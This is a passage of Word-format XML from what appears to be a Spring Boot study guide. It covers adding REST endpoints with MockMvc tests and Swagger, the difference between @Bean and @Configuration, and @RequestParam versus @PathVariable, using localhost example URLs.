        <w:t>: Allows more control over the response status code, headers, and body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139802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9AD8CF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status")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220588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String&gt; getStatus() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495ABC0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OK).body("Success");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EC59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DA73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7E4608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 gives you the flexibility to return both status code and the response body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB9922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Handle Business Logic (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2962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9ED38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wired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB03B2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MyService myService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD9D03C" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E7" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421666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calculate")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70730B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Integer&gt; calculateResult(@RequestParam int a, @RequestParam int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0885B6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myService.calculate(a, b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA627B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result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4DFE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278E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C9AF5D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lls the service method to perform calculations and return the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD73B5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pdate the application.properties or application.yml (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0D1FF9"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 new endpoint requires some configuration (e.g., setting up a property or enabling a feature), you may need to update the application.properties or application.yml file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25906E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0EBCC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greeting.enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610617C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optional and only needed if your new endpoint requires configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CBC1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 the Endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C493A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adding the new endpoint, it's important to test it to ensure that it works as expected. You can use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the endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506122D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9837724"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message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037E676A"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greet/John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2351FDF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Optional) Add Unit and Integration Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B899A6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need to ensure the functionality of your new endpoint, write unit and integration tests using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ockMvc</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F4D3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35398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290AD9A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ConfigureMockMvc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204D7A0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Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574FDAAD" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E7" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D85012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28A1A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ockMvc mockMvc;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673A7CB4" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E7" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49CEFDF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4F137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testGetMessage() throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DAF85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Mvc.perform(get("/api/message"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7722E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status().isOk())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488238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content().string("Hello, Spring Boot!"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B11A5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4C64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4AD0E9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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1649D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ockMvc class allows you to perform HTTP requests and assert the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281BAEE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Optional) Document the API Using Swagger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49126A3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 application is a RESTful service, you may want to add API documentation using </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Swagger</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for better usability and discoverability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628117E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D7E7F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wagger dependencies and annotations to document the API automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E31E59"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4C100D1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controller class</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or use an existing one).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED397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a method to handle the request</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the appropriate HTTP method annotation (e.g., @GetMapping, @PostMapping).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366064A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 parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using @PathVariable, @RequestParam, or @RequestBody as needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0221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business logic</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (optionally, via a service class).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDC50F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turn a response</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> either directly or using ResponseEntity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1B2C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 the endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using tools like Postman or Swagger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13761FD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Add unit tests and Swagger documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B0D75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ese steps, you can easily expose new endpoints in your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0373C2A8" w14:textId="1A358A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680" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DF4D42" w14:textId="0EE167DF" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="009D505D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="658" w:name="_Toc197867872"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference</w:t>
      </w:r>
      <w:r w:rsidR="004F0738" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> between @Bean and @Configuration</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="658"/>
    </w:p>
    <w:p w14:paraId="59A179C8" w14:textId="6347A8D5"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Bean and @Configuration are used in Spring for defining beans, but they serve different purposes and have different scopes of usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C9CD91"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ean Annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E005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Bean is used to define individual beans within a method of a class annotated with @Configuration or any other class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574B3F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method level and the method that returns an object of type T is considered as a bean. The object returned by the @Bean-annotated method will be managed by the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE102C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You typically use @Bean inside a class (which may or may not be annotated with @Configuration) to define a bean that can be injected into other components (e.g., services, controllers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F345A4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678CC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4B5C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4D30B41E" w14:textId="77777777" w:rsidR="004101E7" w:rsidRPr="002C6305" w:rsidRDefault="004101E7" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607AC2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607F06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042E4C1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7F2912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B788A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D0316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myService() method is annotated with @Bean, indicating that an instance of MyServiceImpl will be created and managed by the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A741208"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ation Annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E478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Configuration is used to mark a class as a source of bean definitions. It tells Spring that this class will have methods annotated with @Bean that define beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FFE28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class level. A class annotated with @Configuration is a specialized form of @Component and will be automatically registered as a Spring bean by the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A24B5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ypically, @Configuration is used to create a configuration class where you define beans using @Bean methods, setting up the overall application context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2831B4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5EB64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28B82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3D2607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F45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543A3C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593970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0BB0483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4CF499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F45DC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n this example, the class AppConfig is annotated with @Configuration, which indicates that it will contain @Bean-annotated methods to define beans for the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561B788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788"/>
        <w:gridCol w:w="6148"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="089157B5" w14:textId="77777777" w:rsidTr="004101E7">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76EC450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6122451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an</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AC23C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figuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="426243AD" w14:textId="77777777" w:rsidTr="004101E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ADE71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52B619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individual beans within a method.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EF9DB6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a class that contains bean definitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="196525DD" w14:textId="77777777" w:rsidTr="004101E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4ECB0E1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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EE8D58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method level.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2553C2C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class level.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="0A066CD7" w14:textId="77777777" w:rsidTr="004101E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="586A5E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03BD54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a method as a bean provider.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="115BCE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define a configuration class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="14891BCD" w14:textId="77777777" w:rsidTr="004101E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="338A3A2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xying</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58E630B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oes not automatically proxy methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11E836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proxy-enhanced by Spring (i.e., CGLIB proxy) to ensure the beans are correctly scoped in cases of bean method calls within the same configuration class.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="1531AC4D" w14:textId="77777777" w:rsidTr="004101E7">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AFC35D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nctionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68AAD6B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used in both @Configuration and regular classes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CFD1C4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marily used to mark configuration classes that contain @Bean methods.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DABD2E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C7967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 is used to define beans within a method and can be applied to any method in a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE4B1F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is used to indicate a class that provides bean definitions and should be used to mark configuration classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BA47D7" w14:textId="2632288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681" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="291D5687" w14:textId="105A9356" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="004101E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="659" w:name="_Toc197867873"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="004F0738" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ifference between RequestParam and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="004F0738" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ath</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="004F0738" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ariable? Give me one example with one URL</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="659"/>
    </w:p>
    <w:p w14:paraId="7C053926" w14:textId="501150AA"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RequestParam and @PathVariable are used in Spring MVC to handle incoming HTTP request parameters. However, they differ in how they extract data from the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6E71C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Param</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1076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RequestParam is used to extract query parameters from the URL or form data. These are typically parameters that are passed in the URL's query string (after ?).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AC57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optional or required query parameters passed as key-value pairs in the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAB35A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id=123&amp;name=John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4236F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514BFDD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RequestParam("id") int userId, @RequestParam("name") String userName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5638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65B55D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9E12F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 @RequestParam("id") will capture the value 123 and @RequestParam("name") will capture the value John from the query parameters in the URL (?id=123&amp;name=John).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EED07D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Variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76534A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PathVariable is used to extract values from the URI path itself. These values are passed as part of the URL path, typically as dynamic segments of the URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74689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values embedded in the URI path, such as in RESTful URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3E13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123/John</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779F2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2C5B4A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PathVariable("id") int userId, @PathVariable("name") String userName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45353A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2604C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EE86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PathVariable("id") captures the value 123 and @PathVariable("name") captures the value John from the URL path (/user/123/John).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A0CE2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4129"/>
        <w:gridCol w:w="4358"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="3CC12EBE" w14:textId="77777777" w:rsidTr="009910A9">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="291212B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3564372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Param</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60A533C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hVariable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="24D9C48C" w14:textId="77777777" w:rsidTr="009910A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A2AFEB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cation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E7BC96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from the query string (URL).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DEAD4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directly from the URL path.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="456FE9EA" w14:textId="77777777" w:rsidTr="009910A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5155E3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ical Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66FE2D3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query parameters (e.g., ?id=123&amp;name=John).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="401A20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dynamic segments in the URL (e.g., /user/123/John).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="47A2F055" w14:textId="77777777" w:rsidTr="009910A9">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="716DA0B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Optional Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15BB0C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parameters can be optional (with defaults).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43D7C4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parameters are required in the URL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="50EAC1C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One URL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59189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w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: http://localhost:8080/api/user/123/John?id=456&amp;name=Jane</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20011E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PathVariable</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
